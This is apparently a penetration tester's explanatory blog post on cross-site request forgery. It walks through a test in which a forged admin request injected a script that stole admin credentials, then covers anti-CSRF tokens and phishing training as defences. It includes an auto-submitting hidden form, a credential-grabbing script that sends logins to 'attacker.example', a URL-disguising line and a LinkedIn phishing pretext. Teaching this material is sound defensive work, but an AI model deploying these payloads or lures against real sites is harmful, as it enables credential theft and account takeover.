Everyone with half a mind for security will tell you not to click on links in emails, but few people can explain exactly why you shouldn’t (they will usually offer a canned ‘hackers can steal your credentials if you do’ explanation). Cross-Site Request Forgery (CSRF) is one of those reasons. Clicking on that link can let an attacker forge any user-supplied input on a site and make it indistinguishable from the user submitting it themselves.
CSRF arises because of a problem with how browsers treat cross-origin requests. Take the following example: a user logs into site1.com and the application sets a cookie called ‘auth_cookie’. The user then visits site2.com. If site2.com makes a request to site1.com, the browser sends the auth_cookie along with it.
Normally this doesn’t matter: if it’s a GET request, the page is served, and the same-origin policy stops any funny business. But what if site2.com makes a POST request instead? From the server’s perspective, that request came from the same browser as the valid session and carries the correct authentication cookie. There’s no way to tell the difference, and any state-changing operation can be performed.
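As an illustrative sketch (the endpoint and field name here are invented, not from any real site), a page on site2.com could silently fire such a POST at site1.com like this:

```html
<!-- Hidden form targeting site1.com; the browser attaches site1.com's
     cookies (including 'auth_cookie') to the submission automatically -->
<form action="https://site1.com/update_email" method="POST" id="csrf-form">
  <input type="hidden" name="email" value="attacker@evil.example" />
</form>
<script>
  // Submit as soon as the page loads; no user interaction needed
  document.getElementById('csrf-form').submit();
</script>
```

Because the browser sends ‘auth_cookie’ along automatically, site1.com processes this as if the logged-in user had submitted the form themselves.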
During the course of a recent penetration test I noticed that, on the application I was assessing, admins had the ability to add web pages: a pretty reasonable action for the site in question. Unfortunately, the action of adding a page was vulnerable to CSRF. My pen test attack not only created a new page, but also stole administrative credentials from the site, using some unorthodox HTML.
Now, the start of any CSRF attack is always the payload. The first thing to note here is that when an iframe loads, it sends a GET request to whatever is specified in its ‘src’ attribute. Normally this is a standard page, and the content is displayed. But what if you framed a ‘log-off’ page which invalidated your authentication cookie and then redirected you back to ‘index.html’?
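For illustration, assuming a hypothetical ‘/logoff’ path on the target site, the framing could look like:

```html
<!-- Loading this hidden iframe fires a GET to the log-off page,
     invalidating the victim's session cookie before the next stage -->
<iframe src="https://site1.com/logoff" style="display:none"></iframe>
```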
The danger of this type of CSRF attack is that the attacker isn’t trying to bypass the browser’s same-origin policy; they aren’t breaking it at all. They just need to assign a function to the login button on ‘/admin.aspx’ that grabs the values of the username and password fields and sends them back to the attacker’s server. In our pen test this was pretty simple to do, as the vulnerable application also used jQuery. First, we changed our ‘onload’ function so that it assigned the ‘grab_creds’ function to the login button.
Second, we declared the ‘grab_creds’ function that the code above assigns to the button.
This function uses the age-old ‘getElementById’ to grab the values from the two input boxes on the page. jQuery’s ‘$.get()’ then provides a way of getting them back to the attacker’s server. The attacker now has the injection part of the payload, shown below in full.
[Figures: the onload function; assigning the function to the button; the ‘grab_creds’ function]
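A minimal sketch of what such an injected script might look like (the element IDs and the attacker’s URL are assumptions for illustration, not the client’s actual markup):

```javascript
// Once the login page has loaded, hook the login button
window.onload = function () {
  document.getElementById('login-button').onclick = grab_creds;
};

function grab_creds() {
  // Read the values typed into the two input boxes
  var user = document.getElementById('username').value;
  var pass = document.getElementById('password').value;
  // jQuery's $.get() ships them off to the attacker's server
  $.get('https://attacker.example/log', { u: user, p: pass });
}
```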
The ‘history.replaceState’ line at the top simply rewrites the URL displayed in the address bar of the browser to what would be shown when legitimately on ‘admin.aspx’, making the whole attack even more seamless.
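Something along these lines (the path is illustrative):

```javascript
// Rewrite the visible URL without triggering a navigation
history.replaceState(null, '', '/admin.aspx');
```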
I then went on to test how an attacker would be able to exploit the CSRF. Burp Suite has a ‘Generate CSRF PoC’ function, which would allow an attacker to quickly whip up a payload for this vulnerable site.
From a technical standpoint, all a malicious actor would need to do now is replace the ‘Injection Payload’ text in the generated PoC with their actual injection payload, and they would be ready to initiate an attack. This was the point at which I stopped: I had proved to the client that an attack was possible, and, in the eyes of a pen tester, that is all that is required.
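For reference, a generated PoC typically takes a shape like the following; the endpoint and field names here are placeholders, with ‘Injection Payload’ marking where the script from earlier would go:

```html
<html>
  <body>
    <!-- Auto-submitting form that POSTs the 'add page' request
         cross-origin, riding on the admin's session cookie -->
    <form action="https://www.victim.it/admin/add_page.aspx" method="POST">
      <input type="hidden" name="page_title" value="My Portfolio" />
      <input type="hidden" name="page_content" value="Injection Payload" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```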
If this were being exploited in the wild, the final step would entail the attacker building a site that they believe an admin of www.victim.it would want to visit, and embedding the malicious form submission in a button that the admin would want to click. Once the attacker has created this application, they host it and leave it to gain natural traffic, so that its ‘trust score’ goes up. Once the application is trusted, the attacker could simply find their target on LinkedIn and send them a message that reads something along the lines of:
“Hey *target*, I’m just starting a career in *field in which they work* and would really appreciate it if you could give me a hand. A lot of my work is shown here: *url to our web application with the malicious payload*. Do you have any advice on how I could flesh out my experience given what I’ve already done? Thank you so much, *pseudonym*.”
If the target is logged into the application, and clicks on the button, the attack will succeed, and the vulnerable page will be added. In my pen test, this tactic did work. Shown below is what the result of the attack would look like in the logs of the application.
Protecting against CSRF
The above shows how this attack was demonstrated during my pen test. So, how do we protect against CSRF attacks? There are two approaches: one is implemented in the application, and the other is training users.
The former is really easy to do. All you need to do is include a random, unpredictable string in a hidden field or header with every sensitive request. This value has to be generated by the server and checked for validity whenever a request is submitted. We can also change the form of authentication from cookies to bearer tokens. I would advise using these methods rather than trying to perform a check on the Referer header. That header can be manipulated, and pen testers and hackers alike take a great deal of pleasure in beating an attempt at a ‘smart’ defense.
Trust me: stick to anti-CSRF tokens. However, these protections have to come as part of a defense-in-depth approach. None of the above methods work if you have any Cross-Site Scripting (XSS) vulnerabilities present on the application, since script running in the site’s own origin can simply read the token. Using XSS to bypass CSRF protections is a whole different kettle of fish, but definitely something to bear in mind.
Now, onto training users. This entire attack hinges on a user being tricked into clicking a malicious link or browsing to a malicious site. Anti-phishing training should be standard for all corporations; however, if members of the public are using your application, there is no way to train them all. It is for this very reason that implementing the technical defense we discussed previously is so important. Don’t trust a person if you can trust technology first.
I hope the offensive security perspective on performing these attacks has provided insight into why CSRF really is such an important vulnerability to understand. Going from step 1 (noticing that there was no anti-CSRF token) all the way to step 8 (successfully stealing credentials) was only possible because there were no defenses. A simple anti-CSRF token would have foiled the entire process.
Anti-phishing training would have stopped the attack when the malicious links were emailed to target employees. So, the next time someone asks you why they should never click on links in emails, you can tell them why.